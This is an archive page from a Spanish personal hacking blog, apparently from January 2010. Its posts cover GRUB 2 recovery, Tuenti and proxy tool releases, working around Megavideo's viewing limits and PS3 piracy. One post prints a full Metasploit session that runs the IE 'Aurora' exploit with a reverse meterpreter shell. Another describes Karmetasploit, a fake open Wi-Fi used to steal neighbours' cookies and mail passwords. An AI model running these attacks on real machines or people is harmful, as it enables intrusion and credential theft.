Pepelux

blog

Archivo del enero de 2010

La PS3 ya es pirateable

ene 29

Publicado por Pepelux en Cracking, Exploits | 3 Comentarios

El hacker George Hotz (más conocido por GeoHot y que saltó a la fama por crackear el iPhone) ha conseguido esta vez encontrar una vulnerabilidad en la PS3 que le permite acceder a las zonas privadas y modificar a su antojo. Y no sólo esto … ya ha publicado un exploit que permite acceder a dichas zonas de forma ilimitada.

Dentro de poco veremos a la gente buscando en Megaupload y Rapidshare juegos de PS3 y seguro que muchos programadores de juegos están ya con las manos en la cabeza. Pero apuesto lo que sea a que ahora que es pirateable, se dispararán las ventas de esta consola :)

Para más información:

El exploit lo podeis encontrar aquí

Y el blog de GeoHot aquí

Etiquetas: ,

Descargar vídeos de Megavideo o morir en el intento

ene 26

Publicado por Pepelux en Hacking, Megavideo | 12 Comentarios

Aprovechando que me he instalado dos monitores en el mismo equipo (por cierto, que gozada trabajar con dos pantallas a la vez!!) me puse a buscar páginas para ver películas online, que siempre viene bien trabajar relajado viendo una peli.

El caso es que me metí en peliculasyonkis.com y otras por el estilo y me puse a ver una, alojada en megavideo. Cuando estaba en lo mejor de la película me salió un horrible cartel … ¡¡ has visto 72 minutos de vídeo. Debes esperar 54 minutos o rascarte el bolsillo !!

Me cago en mi sangre!!!! si es que te sacan dinero hasta por respirar …. esto me pasa por pardillo y es que, es la primera vez que usaba megavideo y piqué como un paleto.

Bueno, pues me puse a googlear un poco y tras descartar varias posibles soluciones laboriosas (como abrir dos navegadores, usar proxys, etc) y otras que no iban ya (programas de descarga que dejan la descarga a medias, etc), encontré el algoritmo (en javascript) que encripta el ID del vídeo para obtener la url de descarga (supongo que lo habrán sacado con algún decompilador de flash) … Programita al canto para optimizar esto.

Meto el primer vídeo y llegados a los 200 Mb de descarga (más o menos), se para … me cago en mi sangre otra vez!!! los muy tienen un filtro por IP también!!

Cambiamos al plan B. Modifico el programa para que para cuando llega este momento y, tras una larga espera de 54 minutos, resuma la descarga … lo pruebo y … me cago en todo lo que se menea!!!! no se puede resumir la descarga de un stream y la vuelve a empezar de cero, por lo que estoy en las mismas … grrrrrrrrrrrrr

Vamos al plan C. Voy a modificar de nuevo el dichoso programa para que pare la descarga antes de los 200 Mb, que aún no estoy bloqueado, y esperar los 54 dichosos minutos de nuevo sin cortar la descarga … a ver si esta vez tengo más suerte.

Y como la espera de los 54 minutos se hace algo larga (ya me podría haber visto varias pelis jeje) pues me puse a escribir este post …

Bueno, si consigo algo, ya os contaré :)

Etiquetas: , ,

TPlus 4.0 disponible

ene 22

Publicado por Pepelux en Tuenti | 61 Comentarios

Ya está disponible la versión 4.0 de TPlus en la que hay varias novedades. A parte e solucionar algunos problemas internos, he añadido las siguientes pciones:

  • Cambio de framework 2.0 a framework 3.0 (posiblemente por esto haya que desinstalar la versión previa antes de instalar a 4.0 … si lo instalas y te dice siempre que hay una nueva versión, desinstala antes!!!)
  • Cambio de iconos (mejorando un poco la estética)
  • Añadida comprobación de mensajes nuevos (TPlus te avisará cuando tengas mensajes nuevos pendientes de leer)
  • Posibilidad de envio masivo de mensajes (podrás enviar el mismo mensaje a más de un usuario)
  • Ampliada descarga de fotos a 5000 (tras las quejas de que sólo descarba 1.000 fotos, lo he ampliado a 5.000)
  • Eliminar descarga de fotos duplicadas
  • Imagen asociada al nombre del amigo en lista de amigos (en el listado de amigos ahora verás también una fotografía en miniatura)
  • Temporizador que incrementa las visitas de un amigo cada 12 minutos (dada la insistencia de los usuarios, lo máximo que he podido hacer es incrementar una visita cada 12 minutos)
  • Paginacion en lista de amigos (para acelerar la carga, se mostrarán sólo de 10 en 10 los listados de amigos)
  • Nuevo boton de ayuda (algo muy básico)
  • Nuevo boton de iconizar
  • Posibilidad de iconizar el programa para mantenerlo siempre abierto y poder incrementar visitas (para dejar siempre arrancado TPlus)
  • Captura de los estudios del usuario (además del nombre, estado, uid y ruta de la imagen principal, que ya salían antes)
  • Solucionados problemas al mostrar provincia del usuario

Espero que os guste :)

Etiquetas: , , ,

Tplus supera las 150.000 descargas

ene 21

Publicado por Pepelux en Tuenti | 1 Comentario

Lo que empezó como un simple script en perl para incrementar las visitas de Tuenti al final pasó a ser una aplicación Windows y ya cuenta con más de 150.000 descargas. En sus orígenes, TPlus (o Tuenti Plus) se utilizaba para hacer dos cosas que desde la web era más complicado, como incrementar las visitas o ver a los amigos de amigos de amigos …

Hoy en día Tuenti ha parcheado casi todos los fallos y básicamente es un interfaz para acceder a la web, eso sí, con algunas mejoras que te hacen la vida más fácil, como la posibilidad de descargar todas las fotografías de un usuario (bueno, hasta 1.000 … de momento :) ), ver las imágenes en grande, consultar el correo, cambiar de estado, etc.

Dado el éxito del programa, estoy preparando la versión 4 en la que incluyo algunas mejoras más, que seguro que a más de uno le vendrán bien. Todo ello siguiendo algunas peticiones de usuarios así como con las sugerencias de todo un experto en Tuenti, me refiero al admin de TuentiAdictos

Espero tenerla disponible  en poco tiempo. Un saludo a todos

Etiquetas: , , ,

Squipy 1.2 disponible

ene 18

Publicado por Pepelux en eNYe Sec, Hacking, Squipy | 7 Comentarios

Ya está disponible la primera versión de Squipy. Como ya comenté, Squipy es un sencillo proxy que permite filtrar y modificar los datos que se envían desde el navegador hacia un servidor web. El interfaz está en castellano y en inglés y su manejo es muy sencillo. Además incorpora algunas herramientas adicionales.

La aplicación dispone de dos modalidades de navegación: por un lado, cuando el filtro de captura está desactivado, hay 10 listener que trabajan de forma asíncrona y permiten navegar sin ningún problema. Una vez activamos la depuración, se queda en un único listener que trabaja de forma síncrona y nos permite depurar y modificar datos.

Características principales:

  • El programa permite capturar y modificar los datos enviados a una web.
  • Dispone de conversión automática de GET a POST y viceversa.
  • Tiene un histórico de páginas capturadas donde almacena toda la información.
  • Incorpora un Spider.
  • Permite decodificar un __VIEWSTATE de páginas asp y aspx.
  • Los datos capturados se pueden formatear mostrándose coloreados para una mejor lectura.
  • Permite exportar las capturas en XML y HTML.

Leer el resto de esta entrada »

Etiquetas: , , , , ,

Aurora (última vulnerabilidad de Internet Explorer)

ene 17

Publicado por Pepelux en Exploits, Hacking, Metasploit | 2 Comentarios

Al fin se ha publicado la vulnerabilidad, que afecta a mshtml.dll en Internet Explorer 6 y posiblemente 7 y 8 que no usen DEP. En Metasploit ya han sacado un exploit para poder testear si somos vulnerables. Para probarlo, según pone en el blog de Metasploit, hacemos un msfupdate y luego abrimos msfconsole:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Luego en la máquina vulnerable abrimos Internet Explorer y cargamos http://192.168.0.151:8080/ (cambiando 192.168.0.151 por la IP de la máquina que ejecuta metasploit)

Si todo va bien, obtendremos:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia…success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Se puede obtener más información y ver un vídeo demostrativo en la página de pentester.es

Etiquetas: ,

Recuperar GRUB 2 tras instalar Windows

ene 16

Publicado por Pepelux en Linux | No hay comentarios

Dichoso Windows! Si usas Windows y luego instalas Linux en otra partición el mismo grub te añadirá las particiones de Windows y las de Linux sin ningún problema. ¿Por qué entonces cuando lo haces al revés Windows no tiene en cuenta que NO es el único sistema operativo del mundo y que es posible que en tu máquina tengas ya configurado algo en el MBR?

Antes era más sencillo con el LILO o con GRUB. Bastaba con arrrancar con el “Super Grub Disk” (un programa antiguo pero que me ha sacado de más de un apuro) y restaurar tu MBR o simplemente arrancar la paartición que desees y luego reparar el MBR.

Pero con GRUB 2 la cosa cambia. El Super Grub Disk no me detectaba la partición de Linux (lo que hizo que algo empezara a subir hasta ponerse casi de corbata) así que Googleando, con un litro de café y probando varias cosas al final lo pude solucionar así:

1. Bajar la versión 9.10 de Ubuntu y quemarla en un CD … a pesar de ser usuario fiel de Debian :(

2. Arrancar con el CD de Ubuntu y arrancar con la primera opción, que no te hace cambios en el disco

3. Una vez cargado Ubuntu, abrimos una consola y ejecutamos:

  • sudo fdisk -l     // donde nos saldrá la tabla de particiones y debemos buscar la nuestra de Linux
  • sudo mount /dev/sda3 /mnt    // mi partición de Linux está en /dev/sda3
  • sudo grub-install –root-directory=/mnt /dev/sda

Y si todo ha ido bien, te restaurará el Grub anterior (en el que tapoco tenía Windows :) )

En el caso de que haya dado error por no tener el fichero grub.cfg, lo podemos regenerar así:

  • sudo mount –bind /proc /mnt/proc
  • sudo mount –bind /sys /mnt/sys
  • sudo mount –bind /dev /mnt /dev
  • sudo chroot /mnt update-grub

Luego reiniciamos el equipo y veremos nuestro anterior Grub 2 y, como dije, sin el Windows ya que antes no lo tenía instalado.
Para añadir la partición de Windows tenemos que crear un fichero en /etc/grub.d al que llamaremos 20_windows_xp (ver /etc/grub.d/README para entender el formato del fichero):

#! /bin/bash -e cat << EOF
menuentry “Microsoft Windows XP Professional” {
set root=(hd0,2)
chainloader +1
}
EOF

(No olvidar meter un salto de línea después del EOF)

Luego ejecutar el siguiente comando (ya una vez arrancado nuestro Linux):

  • sudo update-grub2

Reiniciamos para verificarlo y, si no ha salido la partición de Windows, siempre la podemos añadir a mano en el grub.cfg (aunque luego cuando haya una actualización y se regenere la perderemos). Para ello editamos /boot/grub/grub.cfg y añadimos esto:

menuentry “Windows xp” {
insmod ntfs
set root=(hd0,2)
chainloader +1
}

Teniendo en cuenta que yo puse hd0,2 porque tengo en /dev/sda2 mi Windows

Etiquetas: , ,

Tuenti v3.17 disponible

ene 15

Publicado por Pepelux en Tuenti | 20 Comentarios

A pesar de estar corregido el problema con los idiomas al ver a los amigos, de forma casual (ya que el problema ha sido uno nuevo) he tenido que modificar el análisis de datos ya que Tuenti ha cambiado algo.

Espero no tener que retocarlo más :P

Etiquetas: , , ,

TPlus v3.16 disponible

ene 13

Publicado por Pepelux en Tuenti | 6 Comentarios

Ya he corregido el error que les aparecía a algunos usuarios y que no les permitía ver ningún amigo. El problema era por el idioma que utilizaba para Tuenti que, al ser diferente al castellano, las búsquedas en los análisis de ficheros no encontraban resultados.

Lo he modificado para que funcione en cualquier idioma.

Referente al incremento de visitas, ya no funciona más. Ahora Tuenti hace una validación por usuario de manera que un mismo usuario cuando visita a otro, por mucho que lo visite sólo se tiene en cuenta la primera.

Etiquetas: , , ,

Karmetasploit

ene 10

Publicado por Pepelux en Aircrack-ng, Exploits, Hacking, Metasploit, Wifi | 3 Comentarios

El otro día vi en el foro de elhacker.net un post que hablaba sobre karmetasploit y me puse a indagar un poco a ver como iba esto (que lo suyo me costó jeje todo hay que decirlo. En el portátil no hubo forma pero en el PC funcionó a la primera).

Karmetasploit es un plugin de metasploit que usándolo junto con aircrack-ng te permite ir de pesca por el vecindario, o lo que es lo mismo, te permite crear una wifi falsa y totalmente abierta para incitar a los vecinos listillos que quieran conectarse gratis a Internet. Tras conectarse, en el peor de los casos les roba las cookies y si intentan acceder al correo, también las contraseñas de POP. Y en el mejor de los casos, si su sistema operativo tiene algún bug trata de explotárselo llegándote a dar una shell si es posible.

La información original de karmetasploit la puedes ver aquí: http://www.offensive-security.com/metasploit-unleashed/Karmetasploit

Leer el resto de esta entrada »

Etiquetas: , , ,